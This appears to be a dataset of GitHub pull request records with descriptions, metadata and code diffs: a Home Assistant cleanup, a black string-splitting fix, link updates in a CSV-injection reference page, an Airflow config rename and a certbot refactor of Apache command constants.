## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> Remove unnecessary use of async_add_job in openalpr_cloud ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [ ] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Deprecation (breaking change to happen in the future) - [ ] Breaking change (fix/feature causing existing functionality to break) - [x] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [ ] The code change is tested and works locally. - [ ] Local tests pass. **Your PR cannot be merged unless tests pass** - [ ] There is no commented out code in this PR. - [ ] I have followed the [development checklist][dev-checklist] - [ ] I have followed the [perfect PR recommendations][perfect-pr] - [ ] The code has been formatted using Ruff (`ruff format homeassistant tests`) - [ ] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/ [manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/ [quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/ [docs-repository]: https://github.com/home-assistant/home-assistant.io [perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
https://api.github.com/repos/home-assistant/core/pulls/113116
2024-03-12T00:14:59Z
2024-03-12T01:36:34Z
2024-03-12T01:36:34Z
2024-03-13T02:08:07Z
164
home-assistant/core
39,249
Fix unstable formatting on string split + % formatting (fixes #1595)
diff --git a/src/black/__init__.py b/src/black/__init__.py index 64a18655905..09b55b0938c 100644 --- a/src/black/__init__.py +++ b/src/black/__init__.py @@ -2668,9 +2668,9 @@ def rhs(line: Line, features: Collection[Feature]) -> Iterator[Line]: transformers = [ string_merge, string_paren_strip, + string_split, delimiter_split, standalone_comment_split, - string_split, string_paren_wrap, rhs, ] diff --git a/src/blib2to3/pgen2/pgen.py b/src/blib2to3/pgen2/pgen.py index 13ec51d1878..a685145933c 100644 --- a/src/blib2to3/pgen2/pgen.py +++ b/src/blib2to3/pgen2/pgen.py @@ -168,8 +168,7 @@ def calcfirst(self, name: Text) -> None: if symbol in inverse: raise ValueError( "rule %s is ambiguous; %s is in the first sets of %s as well" - " as %s" - % (name, symbol, label, inverse[symbol]) + " as %s" % (name, symbol, label, inverse[symbol]) ) inverse[symbol] = label self.first[name] = totalset diff --git a/tests/data/long_strings.py b/tests/data/long_strings.py index e1ed90f22de..151396b5239 100644 --- a/tests/data/long_strings.py +++ b/tests/data/long_strings.py @@ -380,8 +380,7 @@ def foo(): old_fmt_string1 = ( "While we are on the topic of %s, we should also note that old-style formatting" - " must also be preserved, since some %s still uses it." - % ("formatting", "code") + " must also be preserved, since some %s still uses it." % ("formatting", "code") ) old_fmt_string2 = "This is a %s %s %s %s" % ( @@ -448,8 +447,7 @@ def foo(): assert some_type_of_boolean_expression, ( "Followed by a really really really long string that is used to provide context to" - " the AssertionError exception, which uses dynamic string %s." - % "formatting" + " the AssertionError exception, which uses dynamic string %s." % "formatting" ) assert some_type_of_boolean_expression, ( diff --git a/tests/data/long_strings__regression.py b/tests/data/long_strings__regression.py index 044bb4a5deb..33bf14cfaa3 100644 --- a/tests/data/long_strings__regression.py +++ b/tests/data/long_strings__regression.py @@ -310,6 +310,13 @@ def who(self): passenger_association=passenger_association, ) +if __name__ == "__main__": + for i in range(4, 8): + cmd = ( + r"for pid in $(ps aux | grep paster | grep -v grep | grep '\-%d' | awk '{print $2}'); do kill $pid; done" + % (i) + ) + # output @@ -435,14 +442,12 @@ def foo(): func_call_where_string_arg_has_old_fmt_and_bad_parens( "A long string with {}. This string is so long that it is ridiculous. It can't fit" - " on one line at alllll." - % "formatting", + " on one line at alllll." % "formatting", ) func_call_where_string_arg_has_old_fmt_and_bad_parens( "A long string with {}. This {} is so long that it is ridiculous. It can't fit on" - " one line at alllll." - % ("formatting", "string"), + " one line at alllll." % ("formatting", "string"), ) @@ -702,3 +707,11 @@ def who(self): passenger_association=passenger_association, ) ) + + +if __name__ == "__main__": + for i in range(4, 8): + cmd = ( + r"for pid in $(ps aux | grep paster | grep -v grep | grep '\-%d' | awk" + r" '{print $2}'); do kill $pid; done" % (i) + )
Fixes #1595.
https://api.github.com/repos/psf/black/pulls/1680
2020-09-05T17:24:23Z
2020-09-06T00:24:01Z
2020-09-06T00:24:01Z
2020-09-06T00:24:06Z
1,019
psf/black
23,936
Updating Reference section hyperlinks
diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 6c1236f9b4..d631791043 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -53,11 +53,11 @@ Any formula can be started with ## References -* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) -* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) +* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) +* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) +* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) +
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/527
2022-08-15T05:54:10Z
2022-08-15T09:40:15Z
2022-08-15T09:40:15Z
2022-10-21T16:00:07Z
469
swisskyrepo/PayloadsAllTheThings
8,724
Rename ``processor_poll_interval`` to ``scheduler_idle_sleep_time``
diff --git a/UPDATING.md b/UPDATING.md index 1c291d3d90114..047a9202e7c98 100644 --- a/UPDATING.md +++ b/UPDATING.md @@ -177,6 +177,27 @@ with DAG(dag_id="task_concurrency_example"): BashOperator(task_id="t1", max_active_tis_per_dag=2, bash_command="echo Hi") ``` +### `processor_poll_interval` config have been renamed to `scheduler_idle_sleep_time` + +`[scheduler] processor_poll_interval` setting in `airflow.cfg` has been renamed to `[scheduler] scheduler_idle_sleep_time` +for better understanding. + +It controls the 'time to sleep' at the end of the Scheduler loop if nothing was scheduled inside `SchedulerJob`. + +**Before**: + +```ini +[scheduler] +processor_poll_interval = 16 +``` + +**Now**: + +```ini +[scheduler] +scheduler_idle_sleep_time = 16 +``` + ### Marking success/failed automatically clears failed downstream tasks When marking a task success/failed in Graph View, its downstream tasks that are in failed/upstream_failed state are automatically cleared. diff --git a/airflow/config_templates/config.yml b/airflow/config_templates/config.yml index 4c7cfa89dbee0..56a36efd747c2 100644 --- a/airflow/config_templates/config.yml +++ b/airflow/config_templates/config.yml @@ -1739,13 +1739,12 @@ type: string example: ~ default: "-1" - - name: processor_poll_interval + - name: scheduler_idle_sleep_time description: | Controls how long the scheduler will sleep between loops, but if there was nothing to do in the loop. i.e. if it scheduled something then it will start the next loop - iteration straight away. This parameter is badly named (historical reasons) and it will be - renamed in the future with deprecation of the current name. - version_added: 1.10.6 + iteration straight away. + version_added: 2.2.0 type: string example: ~ default: "1" diff --git a/airflow/config_templates/default_airflow.cfg b/airflow/config_templates/default_airflow.cfg index 464d5f1ed62b7..54315ca470775 100644 --- a/airflow/config_templates/default_airflow.cfg +++ b/airflow/config_templates/default_airflow.cfg @@ -870,9 +870,8 @@ num_runs = -1 # Controls how long the scheduler will sleep between loops, but if there was nothing to do # in the loop. i.e. if it scheduled something then it will start the next loop -# iteration straight away. This parameter is badly named (historical reasons) and it will be -# renamed in the future with deprecation of the current name. -processor_poll_interval = 1 +# iteration straight away. +scheduler_idle_sleep_time = 1 # Number of seconds after which a DAG file is parsed. The DAG file is parsed every # ``min_file_process_interval`` number of seconds. Updates to DAGs are reflected after diff --git a/airflow/configuration.py b/airflow/configuration.py index 2e3e5366c3365..e120b26012200 100644 --- a/airflow/configuration.py +++ b/airflow/configuration.py @@ -167,6 +167,7 @@ class AirflowConfigParser(ConfigParser): ('metrics', 'statsd_datadog_tags'): ('scheduler', 'statsd_datadog_tags', '2.0.0'), ('metrics', 'statsd_custom_client_path'): ('scheduler', 'statsd_custom_client_path', '2.0.0'), ('scheduler', 'parsing_processes'): ('scheduler', 'max_threads', '1.10.14'), + ('scheduler', 'scheduler_idle_sleep_time'): ('scheduler', 'processor_poll_interval', '2.2.0'), ('operators', 'default_queue'): ('celery', 'default_queue', '2.1.0'), ('core', 'hide_sensitive_var_conn_fields'): ('admin', 'hide_sensitive_variable_fields', '2.1.0'), ('core', 'sensitive_var_conn_names'): ('admin', 'sensitive_variable_fields', '2.1.0'), diff --git a/airflow/jobs/scheduler_job.py b/airflow/jobs/scheduler_job.py index a92040b5ab194..d0c016c7ca869 100644 --- a/airflow/jobs/scheduler_job.py +++ b/airflow/jobs/scheduler_job.py @@ -24,6 +24,7 @@ import signal import sys import time +import warnings from collections import defaultdict from datetime import timedelta from typing import Collection, DefaultDict, Dict, List, Optional, Tuple @@ -86,9 +87,9 @@ class SchedulerJob(BaseJob): :param num_times_parse_dags: The number of times to try to parse each DAG file. -1 for unlimited times. :type num_times_parse_dags: int - :param processor_poll_interval: The number of seconds to wait between + :param scheduler_idle_sleep_time: The number of seconds to wait between polls of running processors - :type processor_poll_interval: int + :type scheduler_idle_sleep_time: int :param do_pickle: once a DAG object is obtained by executing the Python file, whether to serialize the DAG object to the DB :type do_pickle: bool @@ -104,9 +105,10 @@ def __init__( subdir: str = settings.DAGS_FOLDER, num_runs: int = conf.getint('scheduler', 'num_runs'), num_times_parse_dags: int = -1, - processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'), + scheduler_idle_sleep_time: float = conf.getfloat('scheduler', 'scheduler_idle_sleep_time'), do_pickle: bool = False, log: logging.Logger = None, + processor_poll_interval: Optional[float] = None, *args, **kwargs, ): @@ -117,7 +119,16 @@ def __init__( # number of times. This is only to support testing, and isn't something a user is likely to want to # configure -- they'll want num_runs self.num_times_parse_dags = num_times_parse_dags - self._processor_poll_interval = processor_poll_interval + if processor_poll_interval: + # TODO: Remove in Airflow 3.0 + warnings.warn( + "The 'processor_poll_interval' parameter is deprecated. " + "Please use 'scheduler_idle_sleep_time'.", + DeprecationWarning, + stacklevel=2, + ) + scheduler_idle_sleep_time = processor_poll_interval + self._scheduler_idle_sleep_time = scheduler_idle_sleep_time self.do_pickle = do_pickle super().__init__(*args, **kwargs) @@ -676,7 +687,7 @@ def _run_scheduler_loop(self) -> None: # If the scheduler is doing things, don't sleep. This means when there is work to do, the # scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU # usage when "idle" - time.sleep(min(self._processor_poll_interval, next_event)) + time.sleep(min(self._scheduler_idle_sleep_time, next_event)) if loop_count >= self.num_runs > 0: self.log.info( diff --git a/docs/apache-airflow/best-practices.rst b/docs/apache-airflow/best-practices.rst index 514b77b6761d9..4e6910923da9b 100644 --- a/docs/apache-airflow/best-practices.rst +++ b/docs/apache-airflow/best-practices.rst @@ -314,7 +314,7 @@ In case you see long delays between updating it and the time it is ready to be t at the following configuration parameters and fine tune them according your needs (see details of each parameter by following the links): -* :ref:`config:scheduler__processor_poll_interval` +* :ref:`config:scheduler__scheduler_idle_sleep_time` * :ref:`config:scheduler__min_file_process_interval` * :ref:`config:scheduler__dag_dir_list_interval` * :ref:`config:scheduler__parsing_processes` diff --git a/docs/apache-airflow/concepts/scheduler.rst b/docs/apache-airflow/concepts/scheduler.rst index 7361a4c661ba9..fda92c95eb806 100644 --- a/docs/apache-airflow/concepts/scheduler.rst +++ b/docs/apache-airflow/concepts/scheduler.rst @@ -366,7 +366,7 @@ However you can also look at other non-performance-related scheduler configurati The scheduler can run multiple processes in parallel to parse DAG files. This defines how many processes will run. -- :ref:`config:scheduler__processor_poll_interval` +- :ref:`config:scheduler__scheduler_idle_sleep_time` Controls how long the scheduler will sleep between loops, but if there was nothing to do in the loop. i.e. if it scheduled something then it will start the next loop iteration straight away. This parameter is badly named (historical reasons) and it will be
`[scheduler] processor_poll_interval` setting in `airflow.cfg` has been renamed to `[scheduler] scheduler_idle_sleep_time` for better understanding. <!-- Thank you for contributing! Please make sure that your code changes are covered with tests. And in case of new features or big changes remember to adjust the documentation. Feel free to ping committers for the review! In case of existing issue, reference it using one of the following: closes: #ISSUE related: #ISSUE How to write a good git commit message: http://chris.beams.io/posts/git-commit/ --> --- **^ Add meaningful description above** Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information. In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed. In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x). In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
https://api.github.com/repos/apache/airflow/pulls/18704
2021-10-04T12:43:47Z
2021-10-05T15:55:00Z
2021-10-05T15:54:59Z
2021-10-05T15:55:04Z
2,092
apache/airflow
14,114
Abstract the remaining OS specific constants from the code
diff --git a/letsencrypt-apache/letsencrypt_apache/configurator.py b/letsencrypt-apache/letsencrypt_apache/configurator.py index 6c6685257ed..836d7713577 100644 --- a/letsencrypt-apache/letsencrypt_apache/configurator.py +++ b/letsencrypt-apache/letsencrypt_apache/configurator.py @@ -86,10 +86,6 @@ class ApacheConfigurator(augeas_configurator.AugeasConfigurator): @classmethod def add_parser_arguments(cls, add): - add("ctl", default=constants.os_constant("ctl"), - help="Path to the 'apache2ctl' binary, used for 'configtest', " - "retrieving the Apache2 version number, and initialization " - "parameters.") add("enmod", default=constants.os_constant("enmod"), help="Path to the Apache 'a2enmod' binary.") add("dismod", default=constants.os_constant("dismod"), @@ -148,10 +144,8 @@ def prepare(self): """ # Verify Apache is installed - for exe in (self.conf("ctl"), self.conf("enmod"), self.conf("dismod")): - if exe is not None: - if not le_util.exe_exists(exe): - raise errors.NoInstallationError + if not le_util.exe_exists(constants.os_constant("restart_cmd")[0]): + raise errors.NoInstallationError # Make sure configuration is valid self.config_test() @@ -165,7 +159,7 @@ def prepare(self): self.parser = parser.ApacheParser( self.aug, self.conf("server-root"), self.conf("vhost-root"), - self.conf("ctl"), self.version) + self.version) # Check for errors in parsing files with Augeas self.check_parsing_errors("httpd.aug") @@ -1277,7 +1271,7 @@ def enable_mod(self, mod_name, temp=False): # Modules can enable additional config files. Variables may be defined # within these new configuration sections. # Reload is not necessary as DUMP_RUN_CFG uses latest config. - self.parser.update_runtime_variables(self.conf("ctl")) + self.parser.update_runtime_variables() def _add_parser_mod(self, mod_name): """Shortcut for updating parser modules.""" @@ -1315,7 +1309,7 @@ def _reload(self): """ try: - le_util.run_script([self.conf("ctl"), "graceful"]) + le_util.run_script(constants.os_constant("restart_cmd")) except errors.SubprocessError as err: raise errors.MisconfigurationError(str(err)) @@ -1326,7 +1320,7 @@ def config_test(self): # pylint: disable=no-self-use """ try: - le_util.run_script([self.conf("ctl"), "configtest"]) + le_util.run_script(constants.os_constant("conftest_cmd")) except errors.SubprocessError as err: raise errors.MisconfigurationError(str(err)) @@ -1346,7 +1340,8 @@ def get_version(self): constants.os_constant("version_cmd")) except errors.SubprocessError: raise errors.PluginError( - "Unable to run %s -v" % self.conf("ctl")) + "Unable to run %s -v" % + constants.os_constant("version_cmd")) regex = re.compile(r"Apache/([0-9\.]*)", re.IGNORECASE) matches = regex.findall(stdout) diff --git a/letsencrypt-apache/letsencrypt_apache/constants.py b/letsencrypt-apache/letsencrypt_apache/constants.py index f8712c247c4..8ac88b197d3 100644 --- a/letsencrypt-apache/letsencrypt_apache/constants.py +++ b/letsencrypt-apache/letsencrypt_apache/constants.py @@ -6,9 +6,11 @@ CLI_DEFAULTS_DEBIAN = dict( server_root="/etc/apache2", vhost_root="/etc/apache2/sites-available", - ctl="apache2ctl", + vhost_files="*", version_cmd=['apache2ctl', '-v'], define_cmd=['apache2ctl', '-t', '-D', 'DUMP_RUN_CFG'], + restart_cmd=['apache2ctl', 'graceful'], + conftest_cmd=['apache2ctl', 'configtest'], enmod="a2enmod", dismod="a2dismod", le_vhost_ext="-le-ssl.conf", @@ -19,9 +21,11 @@ CLI_DEFAULTS_CENTOS = dict( server_root="/etc/httpd", vhost_root="/etc/httpd/conf.d", - ctl="apachectl", + vhost_files="*.conf", version_cmd=['apachectl', '-v'], define_cmd=['apachectl', '-t', '-D', 'DUMP_RUN_CFG'], + restart_cmd=['apachectl', 'graceful'], + conftest_cmd=['apachectl', 'configtest'], enmod=None, dismod=None, le_vhost_ext="-le-ssl.conf", @@ -32,9 +36,11 @@ CLI_DEFAULTS_GENTOO = dict( server_root="/etc/apache2", vhost_root="/etc/apache2/vhosts.d", - ctl="apache2ctl", + vhost_files="*.conf", version_cmd=['/usr/sbin/apache2', '-v'], define_cmd=['/usr/sbin/apache2', '-t', '-D', 'DUMP_RUN_CFG'], + restart_cmd=['apache2ctl', 'graceful'], + conftest_cmd=['apache2ctl', 'configtest'], enmod=None, dismod=None, le_vhost_ext="-le-ssl.conf", diff --git a/letsencrypt-apache/letsencrypt_apache/parser.py b/letsencrypt-apache/letsencrypt_apache/parser.py index 12704c859b6..593c807cccd 100644 --- a/letsencrypt-apache/letsencrypt_apache/parser.py +++ b/letsencrypt-apache/letsencrypt_apache/parser.py @@ -28,7 +28,7 @@ class ApacheParser(object): arg_var_interpreter = re.compile(r"\$\{[^ \}]*}") fnmatch_chars = set(["*", "?", "\\", "[", "]"]) - def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)): + def __init__(self, aug, root, vhostroot, version=(2, 4)): # Note: Order is important here. # This uses the binary, so it can be done first. @@ -37,7 +37,7 @@ def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)): # This only handles invocation parameters and Define directives! self.variables = {} if version >= (2, 4): - self.update_runtime_variables(ctl) + self.update_runtime_variables() self.aug = aug # Find configuration root and make sure augeas can parse it. @@ -60,9 +60,10 @@ def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)): self.loc.update(self._set_locations()) # Must also attempt to parse virtual host root - self._parse_file(self.vhostroot + "/*.conf") + self._parse_file(self.vhostroot + "/" + + constants.os_constant("vhost_files")) - #check to see if there were unparsed define statements + # check to see if there were unparsed define statements if version < (2, 4): if self.find_dir("Define", exclude=False): raise errors.PluginError("Error parsing runtime variables") @@ -91,7 +92,7 @@ def init_modules(self): self.modules.add( os.path.basename(self.get_arg(match_filename))[:-2] + "c") - def update_runtime_variables(self, ctl): + def update_runtime_variables(self): """" .. note:: Compile time variables (apache2ctl -V) are not used within the @@ -101,7 +102,7 @@ def update_runtime_variables(self, ctl): .. todo:: Create separate compile time variables... simply for arg_get() """ - stdout = self._get_runtime_cfg(ctl) + stdout = self._get_runtime_cfg() variables = dict() matches = re.compile(r"Define: ([^ \n]*)").findall(stdout) @@ -121,7 +122,7 @@ def update_runtime_variables(self, ctl): self.variables = variables - def _get_runtime_cfg(self, ctl): # pylint: disable=no-self-use + def _get_runtime_cfg(self): # pylint: disable=no-self-use """Get runtime configuration info. :returns: stdout from DUMP_RUN_CFG @@ -136,9 +137,11 @@ def _get_runtime_cfg(self, ctl): # pylint: disable=no-self-use except (OSError, ValueError): logger.error( - "Error accessing %s for runtime parameters!%s", ctl, os.linesep) + "Error running command %s for runtime parameters!%s", + constants.os_constant("define_cmd"), os.linesep) raise errors.MisconfigurationError( - "Error accessing loaded Apache parameters: %s", ctl) + "Error accessing loaded Apache parameters: %s", + constants.os_constant("define_cmd")) # Small errors that do not impede if proc.returncode != 0: logger.warn("Error in checking parameter list: %s", stderr) diff --git a/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py b/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py index 63eb5c783ae..289b61bb13f 100644 --- a/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py +++ b/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py @@ -11,14 +11,17 @@ class ConstantsTest(unittest.TestCase): @mock.patch("letsencrypt.le_util.get_os_info") def test_get_debian_value(self, os_info): os_info.return_value = ('Debian', '', '') - self.assertEqual(constants.os_constant("ctl"), "apache2ctl") + self.assertEqual(constants.os_constant("vhost_root"), + "/etc/apache2/sites-available") @mock.patch("letsencrypt.le_util.get_os_info") def test_get_centos_value(self, os_info): os_info.return_value = ('CentOS Linux', '', '') - self.assertEqual(constants.os_constant("ctl"), "apachectl") + self.assertEqual(constants.os_constant("vhost_root"), + "/etc/httpd/conf.d") @mock.patch("letsencrypt.le_util.get_os_info") def test_get_default_value(self, os_info): os_info.return_value = ('Nonexistent Linux', '', '') - self.assertEqual(constants.os_constant("ctl"), "apache2ctl") + self.assertEqual(constants.os_constant("vhost_root"), + "/etc/apache2/sites-available") diff --git a/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py b/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py index 023b3990a57..b871f89b7a7 100644 --- a/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py +++ b/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py @@ -145,24 +145,26 @@ def test_update_runtime_variables(self, mock_cfg): expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443", "example_path": "Documents/path"} - self.parser.update_runtime_variables("ctl") + self.parser.update_runtime_variables() self.assertEqual(self.parser.variables, expected_vars) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_vars_bad_output(self, mock_cfg): mock_cfg.return_value = "Define: TLS=443=24" - self.parser.update_runtime_variables("ctl") + self.parser.update_runtime_variables() mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24" self.assertRaises( - errors.PluginError, self.parser.update_runtime_variables, "ctl") + errors.PluginError, self.parser.update_runtime_variables) + @mock.patch("letsencrypt_apache.constants.os_constant") @mock.patch("letsencrypt_apache.parser.subprocess.Popen") - def test_update_runtime_vars_bad_ctl(self, mock_popen): + def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const): mock_popen.side_effect = OSError + mock_const.return_value = "nonexistent" self.assertRaises( errors.MisconfigurationError, - self.parser.update_runtime_variables, "ctl") + self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_exit(self, mock_popen): @@ -170,7 +172,7 @@ def test_update_runtime_vars_bad_exit(self, mock_popen): mock_popen.returncode = -1 self.assertRaises( errors.MisconfigurationError, - self.parser.update_runtime_variables, "ctl") + self.parser.update_runtime_variables) class ParserInitTest(util.ApacheTest): @@ -191,7 +193,7 @@ def test_unparsable(self, mock_cfg): self.assertRaises( errors.PluginError, ApacheParser, self.aug, os.path.relpath(self.config_path), - "/dummy/vhostpath", "ctl", version=(2, 2, 22)) + "/dummy/vhostpath", version=(2, 2, 22)) def test_root_normalized(self): from letsencrypt_apache.parser import ApacheParser @@ -203,7 +205,7 @@ def test_root_normalized(self): "debian_apache_2_4/////two_vhost_80/../two_vhost_80/apache2") parser = ApacheParser(self.aug, path, - "/dummy/vhostpath", "dummy_ctl") + "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) @@ -213,7 +215,7 @@ def test_root_absolute(self): "update_runtime_variables"): parser = ApacheParser( self.aug, os.path.relpath(self.config_path), - "/dummy/vhostpath", "dummy_ctl") + "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) @@ -223,7 +225,7 @@ def test_root_no_trailing_slash(self): "update_runtime_variables"): parser = ApacheParser( self.aug, self.config_path + os.path.sep, - "/dummy/vhostpath", "dummy_ctl") + "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) diff --git a/letsencrypt-apache/letsencrypt_apache/tests/util.py b/letsencrypt-apache/letsencrypt_apache/tests/util.py index 95c95e6a9bb..798d4814b60 100644 --- a/letsencrypt-apache/letsencrypt_apache/tests/util.py +++ b/letsencrypt-apache/letsencrypt_apache/tests/util.py @@ -58,7 +58,7 @@ def setUp(self, test_dir="debian_apache_2_4/two_vhost_80", with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): self.parser = ApacheParser( - self.aug, self.config_path, self.vhost_path, "dummy_ctl_path") + self.aug, self.config_path, self.vhost_path) def get_apache_configurator(
Fix to enable us to support broader range of different configuration schemes - some of which are OS defaults, and abstract remaining hardcoded but still OS dependent values. Fixes #2034
https://api.github.com/repos/certbot/certbot/pulls/2038
2015-12-28T12:31:15Z
2016-01-03T01:45:51Z
2016-01-03T01:45:51Z
2016-05-06T19:22:24Z
3,488
certbot/certbot
1,158